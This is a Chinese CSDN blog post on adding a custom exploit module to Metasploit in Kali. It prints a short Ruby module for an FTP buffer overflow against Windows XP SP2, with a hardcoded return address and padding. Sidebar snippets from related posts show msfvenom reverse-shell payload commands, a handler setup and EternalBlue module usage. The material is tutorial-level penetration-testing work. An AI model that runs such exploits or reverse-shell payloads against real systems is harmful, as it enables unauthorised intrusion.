Kali的Metasploit下添加一个新的exploit

最新推荐文章于 2024-05-06 16:23:04 发布
最新推荐文章于 2024-05-06 16:23:04 发布
阅读量1.9k 收藏 1
点赞数 1
分类专栏: Metasploit

https://blog.csdn.net/SilverMagic/article/details/40978081

  • 注意头文件 class Metasploit3 < 
class MetasploitModule < Msf::Exploit::Remote
  • 首先在/usr/share/metasploit-framework/modules/exploits/目录下新建一个自定义文件夹,例如fwdtest

  • 仿造exploits目录下的其他exp(rb文件)编写自己的exp.rb脚本(这边用0day安全:软件漏洞分析技术里的一个栗子)
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest# ls
0day1.rb
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest# cat 0day1.rb
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
  include Msf::Exploit::Remote::Ftp
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'security test',
      'Description'    => %q{
          This module exploits a buffer overflow.
      },
      'Author'         => 'fwd',
      'License'        => MSF_LICENSE,
      'Privileged'     => true,
      'Payload'        =>
        {
          'Space'    => 300,
          'BadChars' => "\x00",
        },
      'Platform'           => 'win',
      'Targets'        =>
        [
          [ 'Windows XP Pro SP2 English',           { 'Ret' => 0x7c809f83 } ],
        ]))
  end
 
  def exploit
    connect
    attack_buf =  'a'*200
    attack_buf += [target.ret].pack('V')
    attack_buf += payload.encoded
    sock.put(attack_buf)
    handler
    disconnect
  end
end
root@kali:/usr/share/metasploit-framework/modules/exploits/fwdtest# 

 

  • 在控制台下启动metasploit

  • 在msf提示符下输入reload_all重新加载所有模块

  • 在msf提示符下输入use exploit/fwdtest/exp(输入的时候可以用tab补全,如果不能补全说明就有问题)

子曰小玖
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali linux 学习笔记(九十一)metasploit framework——exploit模块 2020.4.24
闵行小鱼塘
04-27 661
本节学习exploit模块
kaliMetasploit添加一个exploit
热门推荐
11-10 2万+
首先在/usr/share/metasploit-framework/modules/exploits/目录下一个自定义文件夹,例如
metasploit update exploit-db
weixin_30840573的博客
02-03 165
echo "Updating The Exploit-DB" cd /usr/share/exploitdb/ wget http://www.exploit-db.com/archive.tar.bz2 tar -xvjf /usr/share/exploitdb/archive.tar.bz2 rm /usr/share/exploitdb/archive.tar.bz2 echo ...
kali使用Metasploit进行渗透攻击
最新发布
lhf13036943631的博客
05-06 715
2、载入easyfilesharing_seh渗透模块,查看需要设置的参数并进行设置,启动模块。(2)查找与EasyFileSharing有关的渗透模块。(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)(输入命令或操作过程、结果截图并进行必要说明)
MetaSploit导入别人写的Metasploit类型的poc的正确姿势
Shaun_X
08-11 1607
需要注意以下三点: 1. 命名,不能用大写字母 像我这个,命名成D-Link_rce2.rb,含有D大写字母,就会导致该文件模块无法导入 2. 命名不能有"-"特殊字符 像我这个,命名成test-tset.rb,含有“-”特殊字符,就会导致该文件模块无法导入 3. 模块类名为MetasploitModule 一般Metasploit类型的poc,classname都是Metasploit3,...
渗透工具——kalimsf简介(以及MSF的基本使用方法)
2301_78006725的博客
09-02 7022
设置payload:set payload windows/x64/meterpreter/reverse_tcp。1. 使用攻击模块:use exploit/windows/smb/ms17_010_eternalblue。设置模块:use auxiliary/scanner/smb/smb_ms17_010。攻击者或者渗透测试者利用系统、应用或服务中的安全漏洞,所进行的攻击行为。在MSF中,一个模块是指MSF框架中所使用的一段软件代码组件。设置目标地址:set RHOSTS [目标地址]
metasploit下Windows的多种提权方法
02-25
目标机:Win7在已经获取到一个meterpretershell后,假如session为1,且权限不是系统权限的前提下,使用以下列出的几种提权方法:本方法主要有以下3个模块。上面这些模块的详细信息在metasploit里已有介绍,这里不再...
kali下载 官网下载地址 下载最版本
11-13
kali下载
Kali版下载地址.txt
11-07
现在BT5早就过时啦,需要的...Kali现在每周会更一个版本的镜像,就不要下载完更个半天了,相当无语, 对于一般的用户,就直接按照64位和32位选择不同第三个或者第四个链接下载就好了,W10表示第10周的镜像文件。
CVE-2017-7269使用教程(解决MSFCONSOLE解决无法加载模块问题)
旺仔Sec&blog
12-15 2081
问题如上 我们先把exp复制到msf目录下面,然后先尝试这打开msf看能不能使用 发现无法加载这个exp,接下来我们来查找问题 通过分析我们可以看到这里面的exp的格式都是下划线,我们试着把刚刚导入的exp也改成这个格式。 导入成功,接下来使用exp进行漏洞利用 漏洞利用成功 ...
Windows远程桌面服务漏洞(CVE-2019-0708)复现测试
四维创智
09-19 6522
1、漏洞概述 2019年5月14日,微软发布了针对远程桌面服务的关键远程执行代码漏洞CVE-2019-0708的补丁,该漏洞影响某些旧版本的Windows。攻击者一旦成功触发该漏洞,便可以在目标系统上执行任意代码,该漏洞的触发无需任何用户交互操作。这就意味着,存在漏洞的计算机只要联网,无需任何操作,就可能遭遇黑客远程攻击,运行恶意代码。其方式与2017年WannaCry恶意软件的传播方式类似。成...
MSF使用总结
qq_44657899的博客
09-25 4171
文章目录生成小马文件运行小马维持会话 生成小马文件 msfvenom -p windows/meterpreter/reverse_tcp LHOST=服务器IP LPORT=服务器监听端口 -f exe -o test.exe 生成的小马在root目录下 运行小马 // 进入msf msfconsole // 监听 use exploit/multi/handler // 设置payload set payload windows/meterpreter/reverse_tcp // 设置 s
Kali-利用metasploit中的exploit/multi/handler进行攻击
齐泽文的Blog
04-22 1万+
在攻击服务器上生成连接软件,LHOST为攻击机IP地址msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.52.133 LPORT=443 -f exe -o met.exe打开msfconsole控制台root@qzwhost:~# msfconsole msfconsole &gt; use exploit/multi/handl...
组策略错误没有权限执行此操作_Metasploit PSExec执行报错大全
weixin_39915815的博客
11-22 4358
声明:该公众号大部分文章来自作者日常学习笔记,也有少部分文章是经过原作者授权和其他公众号白名单转载,未经授权,严禁转载,如需转载,联系开白。请勿利用文章内的相关技术从事非法测试,如因此产生的一切不良后果与文章作者和本公众号无关。所有话题标签:#Web安全 #漏洞复现 #工具使用 #权限提升#权限维持#防护绕过#内网安全 #实战案例#其他笔记 #资源分享 ...
内网渗透测试:获取远程桌面连接记录与 RDP 凭据
A_991128a的博客
07-30 417
Windows 远程桌面是用于管理 Windows服务器的最广泛使用的工具之一。管理员喜欢使用远程桌面,攻击者也喜欢使用(狗头)。在之前的文章中我们已经介绍了很多攻击远程桌面的方法,本篇文章我们继续来探究。在渗透测试中,RDP远程桌面连接的历史记录不可忽视,根据历史连接记录我们往往能够定位出关键的服务器。并且,当我们发现了某台主机上存在远程桌面的连接记录,我们还可以想办法获取其远程桌面登录历史的连接凭据。用于登录RDP 远程桌面会话的凭据通常具有特权,这使它们成为红队操作期间的完美目标。
windows提权的几种姿势
weixin_44300286的博客
09-07 4258
一、工具提权 1、msf提权 准备阶段: 用msfvenom生成一个马:msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.112 lport=4444 -f exe > 3.exe 然后用msf开启一个监听: use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 192.168.1.112 set lport 4444 expl
使用Kali上的Metasploit获取ssh登录到靶机权限
WEL测试
03-30 7208
前置条件 靶机:metasploitable2 靶机IP:192.168.88.137 初始密码是:msfadmin/msfadmin kali安装的镜像为:kali-linux-2019.1a-amd64.iso KaliIP为:192.168.88.132 使用Metasploit获取mysql登录密码 进入Metasploit的控制台执行命令: msfconsole ...
kali metasploit
08-30
Kali Linux是一种专门用于渗透测试和网络安全的操作系统,而Metasploit则是其中一个非常流行的安全工具。Metasploit Framework是一个开源的渗透测试工具,它提供了一套标准化的方法和技术,用于发现和利用安全漏洞。在Kali Linux中,默认已经集成了Metasploit Framework,所以你可以直接在Kali Linux中使用Metasploit来进行渗透测试和漏洞利用。你可以使用命令"msfconsole"来启动Metasploit Framework的交互式控制台,然后可以通过各种模块和插件来执行各种渗透测试任务。请注意,在使用Metasploit进行渗透测试时,务必严格遵守法律和道德规范。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值